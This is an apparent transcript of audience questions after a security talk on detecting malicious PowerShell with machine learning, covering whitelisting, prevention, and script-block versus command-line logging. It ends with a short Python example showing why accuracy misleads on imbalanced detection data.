Yeah, thank you. I'm not going to repeat the first two lines that were said, but I get that admins need to execute PowerShell to do their job. What if they're doing it within a window, and if you notice PowerShell being executed outside that window, you just raise an alert? That would absolutely be the best, right? That's kind of a whitelisting approach, and in a mature organization it would work very well, but I find many organizations have a hard time even logging PowerShell, so implementing a policy like that would be extremely difficult and unreasonable in many places. So yeah, absolutely, I would say do that, or you could even create a whitelist of people who can execute it; normal users may not execute PowerShell, things like that. You could potentially do a whitelisting approach, but I find it to be difficult, and in reality it isn't implemented that well. If you can do it, do it, absolutely.

As far as detecting these malicious PowerShell scripts goes, is there anything you've been working towards to make a case for preventing them, so that in real time they would be stopped before the damage was done? Things like that are kind of out of my realm of concern; I develop threat analytics. In reality, if you can do preventative measures, least-privilege type stuff, that helps; we have advisory services that say, hey, here's what you guys should do, because with good passwords you don't get exploited to begin with such that attackers can execute PowerShell. I haven't looked into it too much. People have talked about signed PowerShell, things like that, and I think that would help, but the only thing I really like to do is detect bad stuff, unfortunately. I'd be interested in what other people are doing there. We have time for only one more question.

Hi. So you've got data from the command line and also from script block logging, and the scripts can be very long, right? Do you see any difference when you try to extract features, like whether the distributions look different between the script block data and the command-line data? Right now, not really; I haven't noticed that. That's not to say there aren't any differences; I hope that if there are, they're being learned in the process, because the data is intermixed. Also, anything you see on the command line is typically included in the script block log as well. If you saw powershell.exe with an encoded command, you'd still see that in the script block log as a separate event, even if you're just looking at the encoded command. Definitely the scripts are longer, right? You've got huge things like backup jobs that are very long, but those would also be broken up. Whether you reassemble the script blocks or analyze them in blocks gets into too much of how we actually productionized this, and I don't want to go too far, but you can reassemble the script blocks, or you could look at just the individual blocks. One of the attacks you see is, okay, mix in lots and lots of known-good code to sway these types of heuristics; if you don't reassemble them, then maybe there's one block that contains the bad part, and potentially you could spread the code throughout the whole thing. What I've noticed is that attackers don't do that yet. So that doesn't really answer the question, but I haven't observed it myself. Yeah, thank you. [Applause]
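As a closing illustration of the precision/recall point from the talk, here is a minimal sketch, with entirely made-up numbers, of why accuracy alone is misleading on a highly imbalanced PowerShell event set:

```python
def classification_metrics(tp, fp, fn, tn):
    """Summarize a confusion matrix as accuracy, precision, and recall."""
    total = tp + fp + fn + tn
    accuracy = (tp + tn) / total
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return accuracy, precision, recall

# Hypothetical: 10,000 PowerShell events, only 50 truly malicious.
# The classifier catches 30 of them and raises 20 false alarms.
acc, prec, rec = classification_metrics(tp=30, fp=20, fn=20, tn=9930)
# Accuracy is 0.996 (looks near-perfect), yet precision and recall are
# both 0.6 -- the model misses 40% of the malicious events, which is why
# the talk stresses precision/recall over accuracy for this use case.
```

The same confusion-matrix counts also drive the false positive and false negative rates the speaker was asked for; scikit-learn's metrics module computes all of these directly once you log predictions and labels.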